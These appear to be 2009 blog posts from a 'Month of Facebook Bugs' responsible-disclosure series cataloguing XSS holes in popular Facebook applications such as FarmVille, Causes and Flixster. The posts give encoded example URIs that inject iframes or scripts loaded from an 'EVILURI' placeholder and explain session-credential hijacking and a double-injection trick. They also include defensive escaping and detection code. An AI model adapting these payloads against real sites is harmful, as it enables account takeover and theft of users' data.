FAXX Hack: Farm Town

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm


FAXX Hack: Movies (Flixster)

Facebook Verified Application

Current Monthly Active Users: 19,392,931

Current Rank on Application Leaderboard: 6

Application Developer: Flixster

Responsiveness: As of Sep. 4, the hole remains and I’ve had no word from Flixster. I received an e-mail from Flixster this evening confirming a fix.

Vulnerability Status: Patched (previously listed as Unpatched)

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/flixster/auth/account-merge?from=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fbk.flixster.com%2Ffacebook%2Fauth%2Faccount-merge%3Ffrom%3D%2522%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E


FAXX Hack: LivingSocial

I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.

Facebook Verified Application

Current Monthly Active Users: 23,688,212

Current Rank on Application Leaderboard: 3

Application Developer: LivingSocial

Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22

Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities.  The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.


FAQs on FAXX and the “Month of Facebook Bugs”

Isn’t this just a month of Facebook Application Bugs?

Not exactly. While each of the vulnerabilities occurs in a Facebook application, a hacker can exploit each one in powerful ways and gain access to many Facebook features. Also, such attacks are made possible by the very structure of the Facebook Platform – the fact that any of these application holes allows the same type of attack demonstrates that the problem goes beyond specific applications.

As long as the Platform remains in its current configuration, application-based attacks (FAXX = Facebook Application XSS/XSRF) will continue to be possible. I can ensure that 30 popular applications are patched, but if a 31st remains open, users are still vulnerable. If Facebook allows third-party applications to operate on their service, they cannot simply relegate security and privacy responsibilities to application developers.

These are all just XSS holes. What sort of attacks are possible with them?

Each XSS hole lets an attacker hijack the session credentials of the current user, provided they’re logged into the application. With those credentials, one can execute any Facebook API request that the application can make during the user’s session.

By default, this includes accessing a user’s full profile information, accessing the profile information of friends, accessing photos of a user or their friends, sending notifications to friends (with links), and posting feed stories on a user’s wall (with links). Notifications and feed stories would appear to come from the hijacked application. Some applications have extended permissions which can be exploited, such as updating a user’s status or publishing to their stream.

Finally, many applications allow for clickjacking installs, which means that users who have not already authorized the application (or who have exempted from the Platform altogether) are still vulnerable to an attack. I plan on releasing full source code demonstrating these attack vectors once the series comes to a close.

But the applications you do publish will be secure once they’re patched, right?

Each time I evaluate an application, my goal is simply to find a hole. Once I’ve found one, I report it and move on to another application. Every application listed here could easily have other vulnerabilities that I have not yet found.

Will this really last an entire month?

When I began this project, I had six holes ready to post. Since starting the series two days ago, I’ve added two more to my list. I started by focusing on the most popular applications, meaning hundreds if not thousands have yet to be tested. Based on my experiences so far, I’m fairly confident that I will find 30 vulnerabilities by the time September finishes.


FAXX Hack: Causes

Facebook Verified Application

Current Monthly Active Users: 26,271,410

Current Rank on Application Leaderboard: 2

Application Developer: Causes

Responsiveness: After notifying Causes, I received word that a fix was being deployed. The patch appears to be thorough.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/causes/help?category=%22%3E%3C%2Ful%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.causes.com%2Ffb%2Fhelp%3Fcategory%3D%2522%253E%253C%252Ful%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%22%3E


The month of Facebook bugs begins!

As posted previously by theharmonyguy…the month of Facebook bugs has begun!

One of our contributors, theharmonyguy, will hopefully be posting one Facebook application bug per day for the month of September.  He is going to keep this up for the entire month if he can.  He does need your help though!  If you have a bug you found either in Facebook or in a Facebook application, please send it to theharmonyguy [aT] gmail.  Full credit will be given to you for finding a bug.

Let’s hope this month we raise some awareness of vulnerabilities in Facebook and the Facebook application platform!  Look for the hashtag #FAXX on Twitter for news and alerts on new vulnerabilities found this month.

You can find out more information in this great article over at DarkReading on the month of Facebook bugs.

FAXX Hack: FarmVille

Current Monthly Active Users: 33,439,207

Current Rank on Application Leaderboard: 1

Application Developer: Zynga

Responsiveness: After notifying Zynga, I received a reply almost immediately from their Senior Director of Security.  The company moved swiftly to patch the hole, and they’ve been both very responsive and very gracious in their communications.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/onthefarm/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffbpr1-proxy.farmville.zynga.com%2Fcurrent%2Findex.php%3Ftype%3D%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E

Notes: Several of the recent holes I’ve found are similar to this one.  Rather than relaying a particular property from the URI within the FBML/HTML of the page, the application included a complete copy of the URI at some point.  This often happens when an application includes a tracker or perhaps needs a form that submits back to the current page.  But if the URI is not escaped prior to being included in such a context, one can add code to the end of the URI that closes a given tag and allows new tags to be inserted.
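The pattern described in the notes above, shown as an added example that is not code from FarmVille or from the original post: a form that submits back to the current page, rendered once with the raw URI and once with the URI attribute-encoded. The form template, the function names and the sample URI are assumptions made for illustration; EVILURI is the page's own placeholder.

```python
from html import escape
from html.parser import HTMLParser

# Constructed request URI: the decoded shape of the page's example, with the
# page's EVILURI placeholder in place of a real host.
SAMPLE_URI = '/current/index.php?type="/><iframe src="http://EVILURI/">'

# Hypothetical template for a form that posts back to the current page.
FORM = '<form method="post" action="%s"><input name="q"/></form>'


def render_raw(request_uri):
    # Before: the complete URI is copied into the attribute as-is.
    return FORM % request_uri


def render_escaped(request_uri):
    # After: attribute-encode it so quotes and angle brackets stay data.
    return FORM % escape(request_uri, quote=True)


class Outline(HTMLParser):
    """Records the tags a parser sees and the form's action attribute."""

    def __init__(self):
        super().__init__()
        self.tags, self.action = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "form":
            self.action = dict(attrs).get("action")


def outline(markup):
    parser = Outline()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.action


if __name__ == "__main__":
    for render in (render_raw, render_escaped):
        print(render.__name__, outline(render(SAMPLE_URI)))
```

In the raw rendering the quote in the URI ends the action attribute early and an iframe tag appears in the parse; in the escaped rendering the parser sees only the form and its input, and the action attribute decodes back to the full URI.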


FAXX Hacks: Previous Vulnerabilities

Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.

FAXX Hack: FunSpace

Facebook Verified Application

Current Monthly Active Users: 8,527,725

Current Rank on Application Leaderboard: 20

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC

FAXX Hack: SuperPoke!

Facebook Verified Application

Current Monthly Active Users: 2,097,148

Current Rank on Application Leaderboard: 71

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E

FAXX Hack: SocialToo

Current Monthly Active Users: 1,835

Application Developer: Stay N’ Alive Productions, LLC

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\"><fb:iframe src='http://EVILURI/'>

Notes: This application generally has extended permissions, such as status_update.

FAXX Hack: YellowPages.ca

Reported By: Uber0n at XSSed.com on March 22, 2009

Current Monthly Active Users: 1,198

Application Developer: Yellow Pages Group Co.

Vulnerability Status: Patched as of Sep. 2, 2009 (previously listed as Unpatched)

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada

Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.
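For reviewing request logs, the nesting described in the notes above can be made visible by percent-decoding each query parameter one layer at a time and recording the tag names that appear at each depth. This is an added example, not part of the original post; the function name, the tag-matching pattern and the benign comparison URI are assumptions, and the first URI is the patched YellowPages.ca example copied from this page.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# The patched YellowPages.ca example URI from this page (EVILURI is the
# page's placeholder), split across lines only for readability.
PAGE_URI = (
    "http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3A"
    "iframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch"
    "%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI"
    "%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E"
    "&YP_where=Canada"
)

# Constructed benign request for comparison.
BENIGN_URI = "http://apps.facebook.com/yellowpagesca/?task=search&YP_what=pizza&YP_where=Canada"

# Heuristic: an opening angle bracket followed by a tag name (FBML names use ':').
TAG_RE = re.compile(r"<([A-Za-z][\w:]*)")


def markup_by_depth(uri, max_depth=5):
    """Map each parameter to [(decode depth, tag names seen at that depth)]."""
    findings = {}
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        depth = 1  # parse_qsl has already removed one encoding layer
        while depth <= max_depth:
            tags = TAG_RE.findall(value)
            if tags:
                findings.setdefault(name, []).append((depth, tags))
            decoded = unquote_plus(value)
            if decoded == value:  # nothing left to decode
                break
            value, depth = decoded, depth + 1
    return findings


if __name__ == "__main__":
    for uri in (PAGE_URI, BENIGN_URI):
        print(markup_by_depth(uri))
```

A tag that first appears at depth 2 or deeper, as the script tag does here, is the signature of the double injection: it only becomes markup after the inner page decodes the parameter a second time.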
